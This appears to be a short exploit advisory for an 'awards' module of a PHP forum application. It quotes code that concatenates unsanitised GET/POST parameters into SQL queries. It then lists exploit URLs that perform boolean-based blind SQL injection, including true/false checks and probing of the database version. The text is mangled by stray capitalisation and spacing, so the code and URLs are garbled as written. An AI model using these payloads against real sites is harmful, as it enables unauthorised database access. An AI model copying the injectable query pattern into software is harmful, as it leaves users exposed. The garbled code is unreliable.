-- [Vuln Code] --
$ This-> ipsclass-> DB-> build_query (array (select => a. user_id,
From => array (awarded => ),
Where => a. award_id =. $ this-> ipsclass-> input [id],
Add_join => array (0 => array (select => m. members_display_name,
From => array (members => m ),
Where => m. id = a. user_id,
Type => left,
)),
));
Bytes --------------------------------------------------------------------------------------
Select => *,
From => awards,
Where => id = ". $ _ POST [award].",
));
Bytes --------------------------------------------------------------------------------------
$ Award_dat [user_id] =$ _ GET [id];
$ Award_dat [award_id] =$ _ POST [award];
######################################## ########
-- [Exploitable] --
Http: // server/index. php? Autocom = awards & do = view & id = 1 [SQL INJECTION]
Http: // server/index. php? Autocom = awards & do = view & id = 1 + and + 1 = 1> true
Http: // server/index. php? Autocom = awards & do = view & id = 1 + and + 1 = 0> false
Http: // server/index. php? Autocom = awards & do = view & id = 1 + and + substring (version (), 1, 1) = 5
Http: // server/index. php? Autocom = awards & do = view & id = 1 + and + substring (version (), 1, 1) = 4
######################################## ########